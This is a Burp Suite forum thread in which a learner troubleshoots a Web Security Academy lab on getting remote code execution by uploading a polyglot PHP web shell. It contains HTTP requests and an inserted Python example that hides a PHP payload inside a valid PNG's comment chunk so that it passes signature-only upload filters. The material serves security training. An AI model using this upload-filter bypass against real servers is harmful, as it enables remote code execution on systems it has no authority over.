Burp Suite User Forum


"Remote code execution via polyglot web shell upload" -- not able to read the uploaded file.

lokesh | Last updated: Mar 06, 2024 08:44AM UTC

I get the below error when I try to

Request:
GET /files/avatars/polyglot.php HTTP/2
Host: 0aa800930455a9d080976cf8008600a6.web-security-academy.net
Cookie: session=29GgwnhPI6n0cQ5tSpupMs9GAHJ8uECa
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Pragma: no-cache
Cache-Control: no-cache
Te: trailers

Response:
HTTP/2 500 Internal Server Error
Date: Wed, 06 Mar 2024 08:40:45 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Content-Length: 0

Ben, PortSwigger Agent | Last updated: Mar 06, 2024 01:25PM UTC

Hi, To confirm, are you seeing this response when you upload the polyglot.php file within the browser?

lokesh | Last updated: Mar 07, 2024 01:34AM UTC

Hi Ben, Yes, I added the comment to the PNG file using exiftool, converted it into polyglot.php and uploaded it successfully. I'm unable to read/get the file; I get a 500 HTTP status code. Can you check if anything else has to be performed to successfully read the uploaded polyglot file? Thanks
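As an added illustration of the polyglot lokesh describes (this is example code written for this page, not lokesh's file, exiftool, or the lab's own material), the block below builds a minimal valid PNG by hand and embeds a PHP snippet in a tEXt chunk keyed "Comment", which is the kind of chunk exiftool's -Comment option writes into a PNG. The payload string and the function names are assumptions for the demonstration; the lab's real payload is not shown in this thread. The parser at the end walks the chunk list and verifies every CRC, so you can confirm that the file is still a structurally valid PNG (it passes a magic-byte or image-header check on upload) while still carrying the PHP open tag that a PHP handler would execute if the server runs the file.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

# Assumed payload for the demonstration only; the lab's payload is not on this page.
PHP_PAYLOAD = b"<?php echo 'polyglot executed'; ?>"


def png_chunk(chunk_type, data):
    """Serialise one PNG chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(chunk_type + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + chunk_type + data + struct.pack(">I", crc)


def make_polyglot_png(payload, width=1, height=1):
    """Build a tiny 8-bit RGB PNG and put `payload` in a tEXt chunk keyed 'Comment'."""
    # IHDR: width, height, bit depth 8, colour type 2 (RGB), compression 0,
    # filter 0, interlace 0.
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    # Each scanline is a filter byte (0 = none) followed by width*3 pixel bytes.
    raw = (b"\x00" + b"\x00\x00\x00" * width) * height
    idat = zlib.compress(raw)
    # tEXt chunk layout: keyword, NUL separator, Latin-1 text.
    text = b"Comment\x00" + payload
    return (
        PNG_SIGNATURE
        + png_chunk(b"IHDR", ihdr)
        + png_chunk(b"tEXt", text)
        + png_chunk(b"IDAT", idat)
        + png_chunk(b"IEND", b"")
    )


def parse_chunks(data):
    """Return [(type, data), ...], verifying the signature and every chunk CRC."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG: bad signature")
    pos = len(PNG_SIGNATURE)
    chunks = []
    while pos + 12 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        cdata = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + cdata) & 0xFFFFFFFF != crc:
            raise ValueError("bad CRC in chunk %r" % ctype)
        chunks.append((ctype, cdata))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks


def looks_like_png(data):
    """The naive magic-byte check an upload filter typically performs."""
    return data[:8] == PNG_SIGNATURE


def contains_php_open_tag(data):
    """What the PHP interpreter cares about: an open tag anywhere in the file."""
    return b"<?php" in data


def comment_text(data):
    """Extract the text of the first tEXt chunk keyed 'Comment', or None."""
    for ctype, cdata in parse_chunks(data):
        if ctype == b"tEXt":
            keyword, _, text = cdata.partition(b"\x00")
            if keyword == b"Comment":
                return text
    return None


if __name__ == "__main__":
    img = make_polyglot_png(PHP_PAYLOAD)
    print("valid PNG header:", looks_like_png(img))
    print("chunks:", [c for c, _ in parse_chunks(img)])
    print("PHP open tag present:", contains_php_open_tag(img))
    print("comment:", comment_text(img))
```

The point the checker makes is the one that matters for the lab: a filter that only inspects the signature (or even one that parses the chunks and checks CRCs) accepts this file as an image, yet the bytes `<?php` sit inside it unchanged, so whether the payload runs depends entirely on whether the server hands a `.php` name in the avatar directory to the PHP interpreter.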

Ben, PortSwigger Agent | Last updated: Mar 07, 2024 11:34AM UTC

Hi, When I ran through this particular lab I was able to view the response associated with the uploading of the polyglot.php file, within the HTTP history, and obtain the In your situation you are saying that you are able to upload the file that you have created but when viewing the corresponding request/response pair within the HTTP history you are observing the 500 response? It might be useful for you to email in at support@portswigger.net and include some screenshots so that we can see exactly what you are doing.

lokesh | Last updated: Mar 21, 2024 03:01AM UTC

Yes, I'm able to upload the file successfully. The POST request is successful. When I try to retrieve the PNG/polyglot file through a GET request, I get a 500 response code. Response: HTTP/2 500 Internal Server Error

Ben, PortSwigger Agent | Last updated: Mar 21, 2024 10:58AM UTC

Hi lokesh, The GET request that you need to view should already be in your HTTP history as part of uploading the file and then navigating back to your account page - from what you have said it sounds like you are sending a separate GET request to try and interact with the uploaded file. Can you confirm whether this is the case?

lokesh | Last updated: Apr 02, 2024 11:25AM UTC

Yes, I'm sending a separate GET request as I'm not able to see an appropriate request/response showing the executed payload in the HTTP history.

Ben, PortSwigger Agent | Last updated: Apr 02, 2024 12:41PM UTC

Hi, The following screenshot shows the sequence of requests that I am seeing when I upload the file and also the GET /files/avatars/polyglot.php request that gives the secret file within the response: https://snipboard.io/REnfVs.jpg To confirm, you do not see this sequence of requests within your proxy history? If not, it might be worth sending us an email and include screenshots of precisely the steps that you are carrying out so that we can see this more clearly. You can send us an email at support@portswigger.net.
